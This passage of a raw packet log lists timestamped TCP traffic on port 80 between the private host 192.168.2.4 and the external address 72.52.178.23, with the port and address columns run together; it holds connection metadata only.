                                                                                Nov 29, 2024 01:52:27.769825935 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.769841909 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.769872904 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.769897938 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.813389063 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.816621065 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.933497906 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.933715105 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.977391005 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.977487087 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.097414970 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.189636946 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.192771912 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.437397003 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.439383030 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.500174046 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.500458956 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.559428930 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.620620012 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.620630026 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.620750904 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.620768070 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.620915890 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.620924950 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.620987892 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.667848110 CET804976772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.667905092 CET4976780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.667963982 CET4976780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.729839087 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.729895115 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.729929924 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.784650087 CET4976980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.788352013 CET804976772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.850590944 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.904679060 CET804976972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.908169031 CET4976980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.908432961 CET4976980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.996783972 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.028284073 CET804976972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.116714001 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.120562077 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.120588064 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.120625019 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.120682955 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.120707035 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.240592957 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.240704060 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.240732908 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.240765095 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.240792036 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.240822077 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.240870953 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.240942001 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.240974903 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.240982056 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.240998030 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.241027117 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.241028070 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.241058111 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.241084099 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.241101027 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.241133928 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.241178989 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.241189957 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.241231918 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.360810041 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.360856056 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.360980988 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.360992908 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.361030102 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.361030102 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.361074924 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.405433893 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.405771971 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.525396109 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.525597095 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.569494963 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.569556952 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.689408064 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.777507067 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.777558088 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.025502920 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.025686979 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.045983076 CET804976972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.046260118 CET4976980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.046260118 CET4976980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.074384928 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.076545000 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.145683050 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.159648895 CET4977180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.166245937 CET804976972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.196506023 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.196585894 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.196655989 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.196713924 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.196722031 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.196847916 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.196856022 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.279555082 CET804977172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.279658079 CET4977180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.279799938 CET4977180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.304306984 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.304372072 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.304414988 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.399657965 CET804977172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.424468040 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.502577066 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.622585058 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.622664928 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.622848988 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.623014927 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.623014927 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.623039007 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.742695093 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.742863894 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.742909908 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.742994070 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.743036985 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.743045092 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.743060112 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.743096113 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.743177891 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.743208885 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.743227959 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.743244886 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.743330002 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.743339062 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.743391991 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.743405104 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.743412971 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.743454933 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.863281012 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.863310099 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.863323927 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.863370895 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.863496065 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.863496065 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:30.905416012 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:30.905524015 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:31.025511026 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:31.025597095 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:31.069456100 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:31.069521904 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:31.189399958 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:31.277431965 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:31.277508020 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:31.416817904 CET804977172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:31.416923046 CET4977180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:31.416982889 CET4977180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:31.520792007 CET4977380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:31.525413990 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:31.525463104 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:31.536916018 CET804977172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:31.580847025 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:31.580931902 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:31.640755892 CET804977372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:31.640824080 CET4977380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:31.640953064 CET4977380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:31.645373106 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:31.701025009 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:31.701042891 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:31.701169014 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:31.701176882 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:31.701250076 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:31.701257944 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:31.701318979 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:31.761058092 CET804977372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:31.810744047 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:31.810826063 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:31.810868979 CET4977280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:31.930831909 CET804977272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.073375940 CET4977480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.193420887 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.193486929 CET4977480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.193599939 CET4977480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.193667889 CET4977480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.193718910 CET4977480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.193742990 CET4977480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.313513994 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.313736916 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.313787937 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.313796997 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.313805103 CET4977480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.313847065 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.313849926 CET4977480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.313863993 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.313910961 CET4977480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.313944101 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.313951969 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.314012051 CET4977480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.314057112 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.314065933 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.314086914 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.314121962 CET4977480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.314138889 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.316433907 CET4977480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.433811903 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.433880091 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.433897018 CET4977480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.433914900 CET4977480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.433931112 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.433939934 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.433988094 CET4977480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.477468014 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.477602005 CET4977480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.597490072 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.597570896 CET4977480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.641485929 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.641588926 CET4977480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.761475086 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.825295925 CET804977372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.825359106 CET4977380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.825395107 CET4977380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.849885941 CET804977472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:32.849960089 CET4977480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.923860073 CET4977480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.941207886 CET4977580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:32.945410013 CET804977372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.061239004 CET804977572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.064805031 CET4977580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.064846039 CET4977580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.117887974 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.184767008 CET804977572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.237879992 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.237947941 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.238214016 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.238248110 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.238317013 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.238332987 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.358333111 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.358345985 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.358355999 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.358422041 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.358432055 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.358444929 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.358491898 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.358494043 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.358510971 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.358547926 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.358547926 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.358565092 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.358594894 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.358603954 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.358645916 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.358716011 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.358725071 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.358733892 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.358771086 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.358789921 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.478636026 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.478698969 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.478729963 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.478739977 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.478749990 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.478795052 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.478832006 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.525543928 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.525667906 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.641485929 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.641561031 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.689471960 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.692549944 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:33.805430889 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.901458025 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:33.901526928 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.149684906 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.149760962 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.192044973 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.192142963 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.269776106 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.293875933 CET804977572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.293986082 CET4977580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.294013977 CET4977580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.312222958 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.312247038 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.312381983 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.312432051 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.312591076 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.312599897 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.312622070 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.409816027 CET4977780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.413970947 CET804977572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.421710014 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.421773911 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.421818972 CET4977680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.529804945 CET804977772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.529895067 CET4977780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.530024052 CET4977780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.541760921 CET804977672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.625457048 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.649902105 CET804977772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.745568991 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.745640993 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.745754004 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.745831966 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.745906115 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.745925903 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.865602016 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.865839005 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.865853071 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.865923882 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.865982056 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.865993023 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.866024971 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.866080046 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.866095066 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.866174936 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.866218090 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.866229057 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.866262913 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.866266966 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.866272926 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.866326094 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.866364002 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.866374016 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.866420031 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.985991955 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.986018896 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.986057043 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.986152887 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.986162901 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:34.986212015 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:34.986251116 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.029485941 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.029628992 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.149604082 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.149701118 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.193406105 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.193476915 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.313509941 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.405503988 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.405682087 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.653454065 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.653515100 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.699815989 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.699882030 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.714190006 CET804977772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.714251041 CET4977780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.714349985 CET4977780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.773555040 CET804977872.52.178.23192.168.2.4
